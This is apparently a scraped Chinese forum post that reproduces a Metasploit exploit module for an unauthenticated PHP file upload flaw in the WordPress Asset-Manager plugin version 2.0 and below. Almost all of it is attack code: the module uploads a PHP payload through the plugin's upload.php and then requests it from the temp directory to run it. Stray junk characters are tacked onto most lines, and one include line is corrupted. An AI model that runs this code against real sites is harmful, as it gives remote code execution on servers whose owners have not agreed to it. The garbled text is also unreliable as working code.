这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。7 y" F+ |# A- T- x6 ~
+ m5 ~4 C& f% O3 P$ }: H
##0 L) N+ d* c ^# b9 L( Y
# This file is part of the Metasploit Framework and may be subject to9 B8 m8 S5 m B* |0 w* u$ W
# redistribution and commercial restrictions. Please see the Metasploit
$ {$ G& z! d! D$ j4 i" i( ?6 N# Framework web site for more information on licensing and terms of use.
/ R. j) t$ a7 j0 E( T2 A# http://metasploit.com/framework/ D$ Q6 x8 w) s8 \8 u; l" M0 b( V
##
& G N# ] n+ I2 Z0 s( G * F+ {% O5 ^5 z9 i$ k! b% ^6 J
require 'msf/core' i* i f1 m. b% J; B+ a
require 'msf/core/exploit/php_exe'
" a( G4 A/ m; v B# g
* e8 b/ a' d2 Y7 `( ]8 Vclass Metasploit3 < Msf::Exploit::Remote3 f6 k/ J- z7 v5 M |: \1 R7 {- f
Rank = ExcellentRanking6 m2 q+ e. ?+ J5 n6 [1 M7 Z* a
# x! S% D/ K6 X; i4 \; a include Msf::Exploit::Remote::HttpClient
, h1 A& Z0 v6 d, z include Msf::Exploit: hpEXE
' i$ f( Y! N! }3 G( V
% |& V1 I5 \! W% Y def initialize(info = {})' }7 v8 S$ ~( \# n( ]& Q. s
super(update_info(info,
- H* D9 n, J+ n9 N 'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability',
1 H2 a& Z! t3 `) g& B2 E; `) {' P 'Description' => %q{+ j. X% r% e* E7 m2 Y: h N
This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
# G+ ^% C5 V( I% u) I plugin. By abusing the upload.php file, a malicious user can upload a file to a
8 n& t7 c- X* l6 j temp directory without authentication, which results in arbitrary code execution.
8 i' I) V' x6 u! Q4 T },
( C2 O4 S# ?8 D$ v! s) w 'Author' =>
7 b* y# u2 W0 H3 ?; v [- T Z' X! L$ [6 }! V0 w% I
'Sammy FORGIT', # initial discovery! }" r& ]; s7 N' j- s
'James Fitts <fitts.james[at]gmail.com>' # metasploit module7 k- J0 ]$ v' O3 G6 X& J% q
],! ~6 I# i* m& e) {% `
'License' => MSF_LICENSE,$ Y3 r- X* T; F5 O9 X+ S
'References' =>- a7 W/ j0 N+ S+ r* q: c/ i1 Q c) ]
[" ]$ P" c# l8 G; g' K8 p
[ 'OSVDB', '82653' ],0 h$ q! v0 T: H9 x
[ 'BID', '53809' ],) x; x6 I Z8 o! B1 X
[ 'EDB', '18993' ],
4 T! U1 L" W% W, w4 L- U, ]% a" z% H [ 'URL', 'http:// www.myhack58.com /' ], g' P: ?6 t# W
],
. C# s+ J5 f/ K {- x( K9 j 'Payload' =>9 x. {# ?: A* }: S) o, p
{7 V' `8 Y0 ]& P
'BadChars' => "\x00",
% \9 w# _+ Q* s9 V7 R* ?$ Z: W) Q },' \" c2 P a; G8 r
'Platform' => 'php',! R: ]0 t9 b- u! b9 W4 `* n1 K3 |
'Arch' => ARCH_PHP," k/ L9 e5 h( g: ^7 x+ A! n/ d% b
'Targets' =>% ~$ H9 k- S+ t: p% E9 A6 s; P4 t
[
2 b& _, ?5 h0 a8 l/ t [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
2 n/ h; y0 N, l9 d b7 I [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]* c4 p2 }# `$ F8 _; C4 k& V
],
3 l7 F0 { p% x7 U1 U. N) o5 @) g 'DefaultTarget' => 0,- N7 h- M4 M% h- b% J0 V Q
'DisclosureDate' => 'May 26 2012')); Z8 t& c% U5 F- Q: c: p0 |( D
1 [0 ~; |- i! E3 M: H register_options(# ?1 x% d$ F2 j' o( F. c$ r' w
[3 W+ r4 G- S" m, g k& _7 ]
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])% q, p& v4 ?* l& H4 e# V4 `* S
], self.class)" a: X# h' s& F5 `+ v' _
end
3 r8 {8 X# ^" p9 L ~6 s7 [
/ W S3 ?7 m. v+ r; ?" B& L def exploit% O- @* Y+ ]1 z9 A
uri = target_uri.path
( ^2 u, m) K# N; ]9 F7 R$ i f uri << '/' if uri[-1,1] != '/'6 S" P: T+ }' |: ~, {
peer = "#{rhost}:#{rport}" s6 |" n8 H6 l
payload_name = "#{rand_text_alpha(5)}.php"" ~. E% R8 o" V4 O" F: i( ]
php_payload = get_write_exec_payload(:unlink_self=>true)5 ?9 u4 H" p( @" s# Y( K% K: d: i
" r! E3 n" x9 v& @* h data = Rex::MIME::Message.new; t. X; K1 F; E7 F. \: v; C/ _
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
3 P' e- U6 t% `$ _ post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')) D( V7 t3 {# J7 L7 U
3 t2 h% Q% A1 r" M8 L print_status("#{peer} - Uploading payload #{payload_name}")9 S) \ K a) H" `6 }' s
res = send_request_cgi({
, P' a0 }& U9 Q7 q4 z8 `$ q# R! ] 'method' => 'POST',: J2 e; d$ E9 H# }5 \! [& B
'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php",
$ h9 X- y$ D; u( u& G5 [ 'ctype' => "multipart/form-data; boundary=#{data.bound}",5 R) q# a% V5 `
'data' => post_data2 B* E8 Q o7 ?2 j' j0 F0 _
})# {/ N4 Y9 B/ n! g) ?
2 D2 m: a: M# {- G* n
if not res or res.code != 200 or res.body !~ /#{payload_name}/
" o6 K1 r8 ?4 j fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
7 L4 ^) U& \! I2 i0 n$ b' V* zend
+ N: u4 B7 }3 K! H% \
4 o$ m2 U8 Z1 t% K7 _ print_status("#{peer} - Executing payload #{payload_name}")
$ ]5 e' o/ F1 ]4 m1 l1 o res = send_request_raw({0 k/ V2 e2 j& c( p; C5 Y. C
'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",2 z( X* t. s1 n& x' m" c+ |. a! q& W
'method' => 'GET'
0 i1 m0 R b$ e1 h })
9 G2 f0 B2 p- x
: W. p k4 q6 b1 }. `) D0 w" D& m if res and res.code != 200
3 z- N; Z5 m! H8 [; S fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")) Z1 a& x* C, w: K, m
end
8 \' s; j% A5 {: F end
5 U2 `4 W& k% r" bend6 G1 I6 s$ G1 G* Z) w$ N( |1 h4 i
|